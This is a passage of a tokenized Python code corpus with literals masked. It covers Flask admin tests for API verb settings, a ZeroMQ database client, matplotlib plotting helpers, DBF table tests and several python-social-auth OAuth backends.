data , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_pf_verbs_user_perms ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_user_login ( sess ) <EOL> result = c . get ( '<STR_LIT>' ) <EOL> assert result . _status_code == <NUM_LIT> , ( <EOL> '<STR_LIT>' % result . _status_code <EOL> ) <EOL> request_path = urlparse . urlparse ( result . headers . get ( '<STR_LIT>' ) ) . path <EOL> self . assertEqual ( <EOL> request_path , <EOL> '<STR_LIT:/>' , <EOL> '<STR_LIT>' % request_path <EOL> ) <EOL> """<STR_LIT>""" <EOL> def test_pf_verbs_add ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> token = self . retrieve_csrf_token ( response . data ) <EOL> data = { <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> found_add = self . db . api_settings . find_one ( <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ) <EOL> assert found_add , '<STR_LIT>' <EOL> def test_pf_verbs_add_dupe ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> token = self . retrieve_csrf_token ( response . data ) <EOL> data = { <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT:name>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT>' : True <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . 
get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for verb in verbs : <EOL> if verb . get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' % count <EOL> ) <EOL> def test_pf_verbs_add_bad_data ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT:name>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT>' : True <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_pf_verbs_remove ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for verb in verbs : <EOL> if verb . get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:0> , <EOL> '<STR_LIT>' % count <EOL> ) <EOL> def test_pf_verbs_deactivate ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . get ( '<STR_LIT>' ) <EOL> deactivated = False <EOL> for verb in verbs : <EOL> if verb . 
get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> if not verb . get ( '<STR_LIT>' ) : <EOL> deactivated = True <EOL> assert deactivated , '<STR_LIT>' <EOL> def test_pf_verbs_activate ( self ) : <EOL> self . db . api_settings . update ( <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' <EOL> } , { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : False <EOL> } <EOL> } <EOL> ) <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . get ( '<STR_LIT>' ) <EOL> activated = False <EOL> for verb in verbs : <EOL> if verb . get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> if verb . get ( '<STR_LIT>' ) : <EOL> activated = True <EOL> assert activated , '<STR_LIT>' <EOL> def test_pf_bad_key_for_actions ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for verb in verbs : <EOL> if verb . get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' % count <EOL> ) <EOL> def test_pf_bad_action_for_actions ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . 
data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for verb in verbs : <EOL> if verb . get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' % count <EOL> ) <EOL> def test_pf_bad_dat_element_for_actions ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for verb in verbs : <EOL> if verb . get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' % count <EOL> ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import unittest , os <EOL> from dateutil . tz import tzlocal <EOL> from dateutil . parser import parse <EOL> from datetime import datetime , timedelta <EOL> class DateParserTestCase ( unittest . TestCase ) : <EOL> def test_no_offset_to_local ( self ) : <EOL> datestr_utc = "<STR_LIT>" <EOL> datestr_as_offset = "<STR_LIT>" <EOL> datestr__astimezone = parse ( datestr_utc ) . astimezone ( tz = tzlocal ( ) ) <EOL> datestr__astimezone_from_same_tz = parse ( datestr_as_offset ) . astimezone ( tz = tzlocal ( ) ) <EOL> self . assertEqual ( datestr__astimezone , datestr__astimezone_from_same_tz ) <EOL> start = datetime . now ( ) - timedelta ( minutes = <NUM_LIT:15> ) <EOL> now = datetime . now ( ) </s>
<s> import msgpack <EOL> WORKER_STATUS = "<STR_LIT>" <EOL> WORKER_HALT = "<STR_LIT>" <EOL> WORKER_LAST_ACTION = "<STR_LIT>" <EOL> class ServiceMessage ( object ) : <EOL> @ staticmethod <EOL> def dumps ( data ) : <EOL> if not isinstance ( data , ( tuple , list ) ) : <EOL> data = ( data , ) <EOL> return msgpack . packb ( data ) <EOL> @ staticmethod <EOL> def loads ( msg ) : <EOL> return msgpack . unpackb ( msg ) </s>
<s> import os <EOL> import re <EOL> def rm_from_pattern ( dir , pattern ) : <EOL> """<STR_LIT>""" <EOL> for f in os . listdir ( dir ) : <EOL> if re . search ( pattern , f ) : <EOL> os . remove ( os . path . join ( dir , f ) ) </s>
<s> from __future__ import absolute_import <EOL> import zmq <EOL> from . constants import FAILURE_STATUS <EOL> from . message import Request , Response , ResponseHeader <EOL> from . error import ELEVATOR_ERROR , TimeoutError <EOL> from . utils . snippets import sec_to_ms , ms_to_sec <EOL> from . utils . patterns import enum <EOL> class Client ( object ) : <EOL> STATUSES = enum ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , db_name = None , * args , ** kwargs ) : <EOL> self . transport = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . endpoint = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . host = "<STR_LIT>" % ( self . transport , self . endpoint ) <EOL> self . context = None <EOL> self . socket = None <EOL> self . _timeout = sec_to_ms ( kwargs . pop ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> self . _status = self . STATUSES . OFFLINE <EOL> self . _db_uid = None <EOL> self . setup_socket ( ) <EOL> if kwargs . pop ( '<STR_LIT>' , True ) is True : <EOL> self . connect ( db_name ) <EOL> def __del__ ( self ) : <EOL> self . teardown_socket ( ) <EOL> @ property <EOL> def status ( self ) : <EOL> return self . _status <EOL> @ status . setter <EOL> def status ( self , status ) : <EOL> if status in [ self . STATUSES . ONLINE , self . STATUSES . OFFLINE ] : <EOL> self . _status = status <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> def setup_socket ( self ) : <EOL> self . context = zmq . Context ( ) <EOL> self . socket = self . context . socket ( zmq . DEALER ) <EOL> self . socket . setsockopt ( zmq . LINGER , <NUM_LIT:0> ) <EOL> self . socket . setsockopt ( zmq . RCVTIMEO , self . timeout ) <EOL> self . socket . connect ( self . host ) <EOL> def teardown_socket ( self ) : <EOL> self . socket . close ( ) <EOL> self . context . term ( ) <EOL> @ property <EOL> def timeout ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _timeout = sec_to_ms ( <NUM_LIT:1> ) <EOL> return self . _timeout <EOL> @ timeout . 
setter <EOL> def timeout ( self , value ) : <EOL> value_in_ms = sec_to_ms ( value ) <EOL> self . _timeout = value_in_ms <EOL> self . socket . setsockopt ( zmq . RCVTIMEO , self . _timeout ) <EOL> def connect ( self , db_name = None , * args , ** kwargs ) : <EOL> if self . status == self . STATUSES . OFFLINE : <EOL> self . status = self . STATUSES . ONLINE <EOL> db_name = '<STR_LIT:default>' if db_name is None else db_name <EOL> self . db_uid = self . send ( None , '<STR_LIT>' , [ db_name ] , * args , ** kwargs ) [ <NUM_LIT:0> ] <EOL> self . db_name = db_name <EOL> return <EOL> def disconnect ( self , * args , ** kwargs ) : <EOL> self . status == self . STATUSES . OFFLINE <EOL> self . teardown_socket ( ) <EOL> def mount ( self , db_name , * args , ** kwargs ) : <EOL> self . send ( None , '<STR_LIT>' , [ db_name ] , * args , ** kwargs ) <EOL> return <EOL> def unmount ( self , db_name , * args , ** kwargs ) : <EOL> self . send ( None , '<STR_LIT>' , [ db_name ] , * args , ** kwargs ) <EOL> return <EOL> def listdb ( self , * args , ** kwargs ) : <EOL> return self . send ( self . db_uid , '<STR_LIT>' , { } , * args , ** kwargs ) <EOL> def createdb ( self , key , db_options = None , * args , ** kwargs ) : <EOL> db_options = db_options or { } <EOL> self . send ( self . db_uid , '<STR_LIT>' , [ key , db_options ] , * args , ** kwargs ) <EOL> return <EOL> def dropdb ( self , key , * args , ** kwargs ) : <EOL> return self . send ( self . db_uid , '<STR_LIT>' , [ key ] , * args , ** kwargs ) <EOL> def repairdb ( self , * args , ** kwargs ) : <EOL> self . send ( self . db_uid , '<STR_LIT>' , { } , * args , ** kwargs ) <EOL> return <EOL> def send ( self , db_uid , command , arguments , * args , ** kwargs ) : <EOL> orig_timeout = ms_to_sec ( self . timeout ) <EOL> timeout = kwargs . pop ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> compression = kwargs . pop ( '<STR_LIT>' , False ) <EOL> if timeout > <NUM_LIT:0> : <EOL> self . timeout = timeout <EOL> self . socket . 
send_multipart ( [ Request ( db_uid = db_uid , <EOL> command = command , <EOL> args = arguments , <EOL> meta = { '<STR_LIT>' : compression } ) ] , ) <EOL> try : <EOL> raw_header , raw_response = self . socket . recv_multipart ( ) <EOL> header = ResponseHeader ( raw_header ) <EOL> response = Response ( raw_response , compression = compression ) <EOL> if header . status == FAILURE_STATUS : <EOL> raise ELEVATOR_ERROR [ header . err_code ] ( header . err_msg ) <EOL> except zmq . ZMQError : <EOL> self . timeout = orig_timeout <EOL> raise TimeoutError ( "<STR_LIT>" ) <EOL> self . timeout = orig_timeout <EOL> return response . datas </s>
<s> """<STR_LIT>""" <EOL> from pytest import fixture <EOL> import datetime <EOL> from . dbf import DBF <EOL> @ fixture <EOL> def table ( ) : <EOL> return DBF ( '<STR_LIT>' ) <EOL> @ fixture <EOL> def loaded_table ( ) : <EOL> return DBF ( '<STR_LIT>' , load = True ) <EOL> records = [ { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:1> ) , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } , <EOL> { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:12> ) , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } ] <EOL> deleted_records = [ { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } ] <EOL> def test_len ( ) : <EOL> assert len ( table ( ) ) == <NUM_LIT:2> <EOL> assert len ( table ( ) . deleted ) == <NUM_LIT:1> <EOL> assert len ( loaded_table ( ) ) == <NUM_LIT:2> <EOL> assert len ( loaded_table ( ) . deleted ) == <NUM_LIT:1> <EOL> def test_list ( ) : <EOL> assert list ( table ( ) ) == records <EOL> assert list ( table ( ) . deleted ) == deleted_records <EOL> assert list ( loaded_table ( ) ) == records <EOL> assert list ( loaded_table ( ) . deleted ) == deleted_records <EOL> assert not isinstance ( table ( ) , list ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import matplotlib as mpl <EOL> import matplotlib . pyplot as plt <EOL> def remove_chartjunk ( ax , spines , grid = None , ticklabels = None , show_ticks = False , <EOL> xkcd = False ) : <EOL> '''<STR_LIT>''' <EOL> all_spines = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:right>' , '<STR_LIT:left>' , '<STR_LIT>' ] <EOL> for spine in spines : <EOL> try : <EOL> ax . spines [ spine ] . set_visible ( False ) <EOL> except KeyError : <EOL> pass <EOL> if not xkcd : <EOL> for spine in set ( all_spines ) . difference ( set ( spines ) ) : <EOL> try : <EOL> ax . spines [ spine ] . set_linewidth ( <NUM_LIT:0.5> ) <EOL> except KeyError : <EOL> pass <EOL> x_pos = set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> y_pos = set ( [ '<STR_LIT:left>' , '<STR_LIT:right>' ] ) <EOL> xy_pos = [ x_pos , y_pos ] <EOL> xy_ax_names = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for ax_name , pos in zip ( xy_ax_names , xy_pos ) : <EOL> axis = ax . __dict__ [ ax_name ] <EOL> if show_ticks or axis . get_scale ( ) == '<STR_LIT>' : <EOL> for p in pos . difference ( spines ) : <EOL> axis . set_tick_params ( direction = '<STR_LIT>' ) <EOL> axis . set_ticks_position ( p ) <EOL> else : <EOL> axis . set_ticks_position ( '<STR_LIT:none>' ) <EOL> if grid is not None : <EOL> for g in grid : <EOL> assert g in ( '<STR_LIT:x>' , '<STR_LIT:y>' ) <EOL> ax . grid ( axis = grid , color = '<STR_LIT>' , linestyle = '<STR_LIT:->' , linewidth = <NUM_LIT:0.5> ) <EOL> if ticklabels is not None : <EOL> if type ( ticklabels ) is str : <EOL> assert ticklabels in set ( ( '<STR_LIT:x>' , '<STR_LIT:y>' ) ) <EOL> if ticklabels == '<STR_LIT:x>' : <EOL> ax . set_xticklabels ( [ ] ) <EOL> if ticklabels == '<STR_LIT:y>' : <EOL> ax . set_yticklabels ( [ ] ) <EOL> else : <EOL> assert set ( ticklabels ) | set ( ( '<STR_LIT:x>' , '<STR_LIT:y>' ) ) > <NUM_LIT:0> <EOL> if '<STR_LIT:x>' in ticklabels : <EOL> ax . set_xticklabels ( [ ] ) <EOL> elif '<STR_LIT:y>' in ticklabels : <EOL> ax . 
set_yticklabels ( [ ] ) <EOL> def maybe_get_ax ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> ax = kwargs . pop ( '<STR_LIT>' ) <EOL> elif len ( args ) == <NUM_LIT:0> : <EOL> fig = plt . gcf ( ) <EOL> ax = plt . gca ( ) <EOL> elif isinstance ( args [ <NUM_LIT:0> ] , mpl . axes . Axes ) : <EOL> ax = args [ <NUM_LIT:0> ] <EOL> args = args [ <NUM_LIT:1> : ] <EOL> else : <EOL> ax = plt . gca ( ) <EOL> return ax , args , dict ( kwargs ) <EOL> def maybe_get_fig_ax ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> ax = kwargs . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in kwargs : <EOL> fig = kwargs . pop ( '<STR_LIT>' ) <EOL> else : <EOL> fig = plt . gcf ( ) <EOL> elif len ( args ) == <NUM_LIT:0> : <EOL> fig = plt . gcf ( ) <EOL> ax = plt . gca ( ) <EOL> elif isinstance ( args [ <NUM_LIT:0> ] , mpl . figure . Figure ) and isinstance ( args [ <NUM_LIT:1> ] , mpl . axes . Axes ) : <EOL> fig = args [ <NUM_LIT:0> ] <EOL> ax = args [ <NUM_LIT:1> ] <EOL> args = args [ <NUM_LIT:2> : ] <EOL> else : <EOL> fig , ax = plt . subplots ( <NUM_LIT:1> ) <EOL> return fig , ax , args , dict ( kwargs ) <EOL> def maybe_get_linewidth ( ** kwargs ) : <EOL> try : <EOL> key = ( set ( [ "<STR_LIT>" , "<STR_LIT>" , '<STR_LIT>' ] ) & set ( kwargs ) ) . pop ( ) <EOL> lw = kwargs [ key ] <EOL> except KeyError : <EOL> lw = <NUM_LIT> <EOL> return lw </s>
<s> def hello_command ( name , print_counter = False , repeat = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( repeat ) : <EOL> if print_counter : <EOL> print i + <NUM_LIT:1> , <EOL> print '<STR_LIT>' % name <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import scriptine <EOL> scriptine . run ( ) </s>
<s> from social . backends . aol import AOLOpenId as AolBackend </s>
<s> from social . backends . odnoklassniki import OdnoklassnikiOAuth2 as OdnoklassnikiBackend , OdnoklassnikiApp as OdnoklassnikiAppBackend </s>
<s> from social . pipeline . user import get_username , create_user , user_details as update_user_details <EOL> get_username , create_user , update_user_details </s>
<s> import re <EOL> from django import template <EOL> from social . backends . oauth import OAuthAuth <EOL> register = template . Library ( ) <EOL> name_re = re . compile ( r'<STR_LIT>' ) <EOL> @ register . filter <EOL> def backend_name ( backend ) : <EOL> name = backend . __class__ . __name__ <EOL> name = name . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> name = name . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> name = name . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> name = name_re . sub ( r'<STR_LIT>' , name ) <EOL> return name <EOL> @ register . filter <EOL> def backend_class ( backend ) : <EOL> return backend . name . replace ( '<STR_LIT:->' , '<STR_LIT:U+0020>' ) <EOL> @ register . filter <EOL> def icon_name ( name ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:username>' : '<STR_LIT:user>' , <EOL> } . get ( name , name ) <EOL> @ register . filter <EOL> def social_backends ( backends ) : <EOL> backends = [ ( name , backend ) for name , backend in backends . items ( ) <EOL> if name not in [ '<STR_LIT:username>' , '<STR_LIT:email>' ] ] <EOL> backends . sort ( key = lambda b : b [ <NUM_LIT:0> ] ) <EOL> return [ backends [ n : n + <NUM_LIT:10> ] for n in range ( <NUM_LIT:0> , len ( backends ) , <NUM_LIT:10> ) ] <EOL> @ register . filter <EOL> def legacy_backends ( backends ) : <EOL> backends = [ ( name , backend ) for name , backend in backends . items ( ) <EOL> if name in [ '<STR_LIT:username>' , '<STR_LIT:email>' ] ] <EOL> backends . sort ( key = lambda b : b [ <NUM_LIT:0> ] ) <EOL> return backends <EOL> @ register . 
filter <EOL> def oauth_backends ( backends ) : <EOL> backends = [ ( name , backend ) for name , backend in backends . items ( ) <EOL> if issubclass ( backend , OAuthAuth ) ] <EOL> backends . sort ( key = lambda b : b [ <NUM_LIT:0> ] ) <EOL> return backends <EOL> @ register . simple_tag ( takes_context = True ) <EOL> def associated ( context , backend ) : <EOL> user = context . get ( '<STR_LIT:user>' ) <EOL> context [ '<STR_LIT>' ] = None <EOL> if user and user . is_authenticated ( ) : <EOL> try : <EOL> context [ '<STR_LIT>' ] = user . social_auth . filter ( <EOL> provider = backend . name <EOL> ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> pass <EOL> return '<STR_LIT>' </s>
<s> from pyramid . view import view_config <EOL> @ view_config ( route_name = '<STR_LIT>' , renderer = '<STR_LIT>' ) <EOL> def home ( request ) : <EOL> return { } <EOL> @ view_config ( route_name = '<STR_LIT>' , renderer = '<STR_LIT>' ) <EOL> def done ( request ) : <EOL> return { } </s>
<s> from social . apps . django_app . tests import * </s>
<s> """<STR_LIT>""" <EOL> import ssl <EOL> from social . backends . oauth import BaseOAuth2 <EOL> class AmazonOAuth2 ( BaseOAuth2 ) : <EOL> name = '<STR_LIT>' <EOL> ID_KEY = '<STR_LIT>' <EOL> AUTHORIZATION_URL = '<STR_LIT>' <EOL> ACCESS_TOKEN_URL = '<STR_LIT>' <EOL> DEFAULT_SCOPE = [ '<STR_LIT>' ] <EOL> REDIRECT_STATE = False <EOL> ACCESS_TOKEN_METHOD = '<STR_LIT:POST>' <EOL> SSL_PROTOCOL = ssl . PROTOCOL_TLSv1 <EOL> EXTRA_DATA = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> def get_user_details ( self , response ) : <EOL> """<STR_LIT>""" <EOL> name = response . get ( '<STR_LIT:name>' ) or '<STR_LIT>' <EOL> fullname , first_name , last_name = self . get_user_names ( name ) <EOL> return { '<STR_LIT:username>' : name , <EOL> '<STR_LIT:email>' : response . get ( '<STR_LIT:email>' ) , <EOL> '<STR_LIT>' : fullname , <EOL> '<STR_LIT>' : first_name , <EOL> '<STR_LIT>' : last_name } <EOL> def user_data ( self , access_token , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> response = self . get_json ( '<STR_LIT>' , <EOL> params = { '<STR_LIT>' : access_token } ) <EOL> if '<STR_LIT>' in response : <EOL> response = { <EOL> '<STR_LIT>' : response [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : response [ '<STR_LIT>' ] [ '<STR_LIT:Name>' ] , <EOL> '<STR_LIT:email>' : response [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> } <EOL> return response </s>
<s> """<STR_LIT>""" <EOL> from social . backends . legacy import LegacyAuth <EOL> class EmailAuth ( LegacyAuth ) : <EOL> name = '<STR_LIT:email>' <EOL> ID_KEY = '<STR_LIT:email>' <EOL> REQUIRES_EMAIL_VALIDATION = True <EOL> EXTRA_DATA = [ '<STR_LIT:email>' ] </s>
<s> """<STR_LIT>""" <EOL> from social . backends . oauth import BaseOAuth2 <EOL> class MeetupOAuth2 ( BaseOAuth2 ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> AUTHORIZATION_URL = '<STR_LIT>' <EOL> ACCESS_TOKEN_URL = '<STR_LIT>' <EOL> ACCESS_TOKEN_METHOD = '<STR_LIT:POST>' <EOL> DEFAULT_SCOPE = [ '<STR_LIT>' ] <EOL> SCOPE_SEPARATOR = '<STR_LIT:U+002C>' <EOL> REDIRECT_STATE = False <EOL> STATE_PARAMETER = '<STR_LIT:state>' <EOL> def get_user_details ( self , response ) : <EOL> """<STR_LIT>""" <EOL> fullname , first_name , last_name = self . get_user_names ( <EOL> response . get ( '<STR_LIT:name>' ) <EOL> ) <EOL> return { '<STR_LIT:username>' : response . get ( '<STR_LIT:username>' ) , <EOL> '<STR_LIT:email>' : response . get ( '<STR_LIT:email>' ) or '<STR_LIT>' , <EOL> '<STR_LIT>' : fullname , <EOL> '<STR_LIT>' : first_name , <EOL> '<STR_LIT>' : last_name } <EOL> def user_data ( self , access_token , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . get_json ( '<STR_LIT>' , <EOL> params = { '<STR_LIT>' : access_token } ) </s>
<s> """<STR_LIT>""" <EOL> import imp <EOL> import six <EOL> from social . utils import handle_http_errors <EOL> from social . backends . oauth import BaseOAuth2 <EOL> from social . exceptions import AuthFailed , AuthCanceled <EOL> class ShopifyOAuth2 ( BaseOAuth2 ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> ID_KEY = '<STR_LIT>' <EOL> EXTRA_DATA = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> REDIRECT_STATE = False <EOL> @ property <EOL> def shopifyAPI ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> fp , pathname , description = imp . find_module ( '<STR_LIT>' ) <EOL> self . _shopify_api = imp . load_module ( '<STR_LIT>' , fp , pathname , <EOL> description ) <EOL> return self . _shopify_api <EOL> def get_user_details ( self , response ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT:username>' : six . text_type ( response . get ( '<STR_LIT>' , '<STR_LIT>' ) ) . replace ( <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> } <EOL> def extra_data ( self , user , uid , response , details = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> data = super ( ShopifyOAuth2 , self ) . extra_data ( user , uid , response , <EOL> details , * args , ** kwargs ) <EOL> session = self . shopifyAPI . Session ( self . data . get ( '<STR_LIT>' ) . strip ( ) ) <EOL> token = session . request_token ( data [ '<STR_LIT>' ] ) <EOL> data [ '<STR_LIT>' ] = token <EOL> return dict ( data ) <EOL> def auth_url ( self ) : <EOL> key , secret = self . get_key_and_secret ( ) <EOL> self . shopifyAPI . Session . setup ( api_key = key , secret = secret ) <EOL> scope = self . get_scope ( ) <EOL> state = self . state_token ( ) <EOL> self . strategy . session_set ( self . name + '<STR_LIT>' , state ) <EOL> redirect_uri = self . get_redirect_uri ( state ) <EOL> session = self . shopifyAPI . Session ( self . data . get ( '<STR_LIT>' ) . strip ( ) ) <EOL> return session . 
